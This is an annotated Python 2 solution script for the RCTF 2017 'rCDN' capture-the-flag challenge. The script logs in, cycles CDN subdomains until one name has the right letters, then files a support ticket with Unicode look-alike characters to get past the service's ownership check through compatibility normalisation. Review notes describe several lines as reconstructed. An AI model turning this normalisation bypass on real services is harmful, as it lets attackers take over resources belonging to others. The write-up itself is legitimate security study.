RCTF 2017 - rCDN Solution
# coding: utf-8
# Unfortunately solved 20 minutes after the end of the CTF :(
import re
import sys
import string
import requests
import itertools
# Base URL of the challenge instance; left blank in this published copy.
target = ''

# Account credentials, redacted by the author. Keep real values out of
# shared source (read them from the environment or a local config instead).
username = 'XXXXXXXXXX'
password = 'XXXXXXXXXX'

# Endpoints: each one is a fixed path appended to the base URL.
url_login = ''.join((target, 'signin'))
url_dashboard = ''.join((target, 'dashboard'))
url_create_domain = ''.join((target, 'dashboard/basic/new'))
# The trailing '{}' is filled in with a subdomain name by the caller.
url_destroy_domain = ''.join((target, 'dashboard/basic/destroy/{}'))
url_tickets = ''.join((target, 'support/ticket'))
url_create_ticket = ''.join((target, 'support/ticket/new'))

# Proxy mapping handed to the requests calls; the proxy URL is blank here.
proxies = dict(http='')
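def get_csrfmiddlewaretoken(url):
    """Fetch *url* and return the CSRF token embedded in the page.

    The token is the first ``value='...'`` attribute in the response body
    that holds exactly 64 alphanumeric characters.

    NOTE(review): the published listing lost part of both token lines.
    ``re.search(...)`` followed by ``.group(1)`` is reconstructed from the
    surviving pattern and arguments; confirm against the original gist.

    Raises:
        ValueError: if the response body contains no such attribute.
    """
    # Sent with the same proxy mapping as every other request in this script.
    resp = sess.get(url, proxies=proxies)
    found = re.search('value=\'([a-zA-Z0-9]{64})\'', resp.content)
    if found is None:
        # Fail with a clear message instead of an AttributeError on None.
        raise ValueError('no CSRF token found at ' + url)
    return found.group(1)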
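def login():
    """Sign in with the module-level ``username`` and ``password``.

    Returns True when the response body contains 'Sign out', which the
    script treats as proof of an authenticated session, and False otherwise.

    NOTE(review): the published listing lost the closing brace of ``data``
    and the start of the request line. A POST of the form to ``url_login``
    is reconstructed from the surviving ``data=data, proxies=proxies)``;
    confirm against the original gist.
    """
    print('[*] logging in...')
    # The sign-in form needs a fresh token taken from the page that serves it.
    csrfmiddlewaretoken = get_csrfmiddlewaretoken(url_login)
    data = {
        'csrfmiddlewaretoken': csrfmiddlewaretoken,
        'username': username,
        'password': password,
    }
    resp = sess.post(url_login, data=data, proxies=proxies)
    return 'Sign out' in resp.content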
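def create_domain():
    """Ask the service for a new Basic CDN subdomain.

    The outcome is read from the session's 'messages' cookie, not from the
    response body.

    Returns:
        The eight-character alphanumeric name found between two literal
        backslashes in the cookie, or False when the cookie carries the
        "exceeded maximum number" notice.

    Raises:
        ValueError: if the cookie holds neither the notice nor a name.

    NOTE(review): the published listing lost part of both ``subdomain``
    lines. ``re.search(...)`` followed by ``.group(1)`` is reconstructed
    from the surviving pattern and arguments; confirm against the original.
    """
    print('[*] creating subdomain')
    sess.get(url_create_domain, proxies=proxies)
    messages = sess.cookies['messages']
    fail_msg = 'You have exceeded maximum number of Basic CDN service'
    if fail_msg in messages:
        return False
    # '\\\\' in a plain string literal is the regex `\\`: one literal backslash.
    found = re.search('\\\\([a-zA-Z0-9]{8})\\\\', messages)
    if found is None:
        raise ValueError('no subdomain name in the messages cookie')
    return found.group(1)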
def destroy_domain(subdomain):
    """Request removal of *subdomain* and return the 'messages' cookie.

    The request is a plain GET with no CSRF token, unlike the sign-in and
    ticket forms. A state-changing endpoint that accepts this can be
    triggered cross-site, so a reviewer of the service should flag it.
    """
    print('[*] destroying subdomain: ' + subdomain)
    destroy_url = url_destroy_domain.format(subdomain)
    # Only the cookie the server sets in reply is of interest, not the body.
    sess.get(destroy_url, proxies=proxies)
    return sess.cookies['messages']
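def create_ticket(subdomain):
    """Submit a support ticket naming *subdomain* and report the outcome.

    The same value is sent as the ticket's subject, subdomain and message.

    Returns:
        The "Only email support ..." notice when the response is a 200 page
        containing it; otherwise the session's 'messages' cookie.

    NOTE(review): the published listing lost the closing brace of ``data``
    and the start of the request line. A POST of the form to
    ``url_create_ticket`` is reconstructed from the surviving
    ``data=data, proxies=proxies)``; confirm against the original gist.
    """
    print('[*] creating ticket for subdomain: ' + subdomain)
    # The token comes from the same page the ticket form is served on.
    csrfmiddlewaretoken = get_csrfmiddlewaretoken(url_create_ticket)
    data = {
        'csrfmiddlewaretoken': csrfmiddlewaretoken,
        'subject': subdomain,
        'subdomain': subdomain,
        'message': subdomain,
    }
    resp = sess.post(url_create_ticket, data=data, proxies=proxies)
    fail_msg = 'Only email support is available for Basic CDN Service.'
    if resp.status_code == 200 and fail_msg in resp.content:
        return fail_msg
    return sess.cookies['messages']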
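# One HTTP session shared by every helper above; they read the global `sess`.
sess = requests.session()

# Keep the result under its own name: rebinding `login` would hide the function.
logged_in = login()
if not logged_in:
    print('[-] failed to login')
    # Nothing below can work without an authenticated session.
    sys.exit(1)

# Lower-case fragments to look for in an assigned name. Each appears to be the
# compatibility expansion of a single Unicode symbol (unit signs, ligatures).
# This is inferred from the entries and from the characters used further
# down; the page does not state it. Entries repeat and nest ('hz' inside
# 'khz'), so the match count below is a loose filter, not a count of
# distinct symbols.
required = [
    'hv', 'mv', 'sd', 'ss', 'ppv', 'wc', 'mc', 'md', 'dj', 'cd', 'wz', 'hg',
    'erg', 'ev', 'ltd', 'hpa', 'da', 'au', 'bar', 'ov', 'pc', 'dm', 'dm2',
    'dm3', 'iu', 'pa', 'na', 'ma', 'ka', 'kb', 'mb', 'gb', 'cal', 'kcal',
    'pf', 'nf', 'mg', 'kg', 'hz', 'khz', 'mhz', 'ghz', 'thz', 'ml', 'dl',
    'kl', 'fm', 'nm', 'mm', 'cm', 'km', 'mm2', 'cm2', 'm2', 'km2', 'mm3',
    'cm3', 'm3', 'km3', 'pa', 'kpa', 'mpa', 'gpa', 'rad', 'ps', 'ns', 'ms',
    'pv', 'nv', 'mv', 'kv', 'mv', 'pw', 'nw', 'mw', 'kw', 'mw', 'bq', 'cc',
    'cd', 'db', 'gy', 'ha', 'hp', 'in', 'kk', 'km', 'kt', 'lm', 'ln', 'log',
    'lx', 'mb', 'mil', 'mol', 'ph', 'ppm', 'pr', 'sr', 'sv', 'wb', 'gal',
    'ff', 'fi', 'fl', 'ffi', 'ffl', 'st', 'st', 'no', 'sm', 'tel', 'tm',
    'fax',
]

# NOTE(review): as extracted, the loop never exits and never calls
# destroy_domain(), so the ticket step below was unreachable. Leaving the
# loop on a hit and releasing rejected names is a reconstruction; confirm
# against the original gist.
while True:
    subdomain = create_domain()
    if not subdomain:
        # create_domain() returns False once the service quota is reached;
        # the substring test below would raise TypeError on it.
        print('[-] subdomain quota reached')
        sys.exit(1)
    matches = [x for x in required if x in subdomain]
    if len(matches) >= 2:
        print('[+] Subdomain: ' + subdomain)
        break
    destroy_domain(subdomain)

# Found domain: 'ghzlnmdg'
# The ticket names a look-alike of that recorded name only, not of whatever
# the loop returned. U+3393 (SQUARE GHZ) and U+339A (SQUARE NM) stand in for
# 'ghz' and 'nm'. Presumably the service compares names after compatibility
# normalisation and case folding; its code is not shown here. The lesson for
# the service side is to normalise a name once, before both the ownership
# check and the lookup.
# `.decode` on a byte-string literal: this script targets Python 2.
t = '\xe3\x8e\x93'.decode('utf-8') + 'l' + '\xe3\x8e\x9a'.decode('utf-8') + 'dg'
print('[*] ' + create_ticket(t))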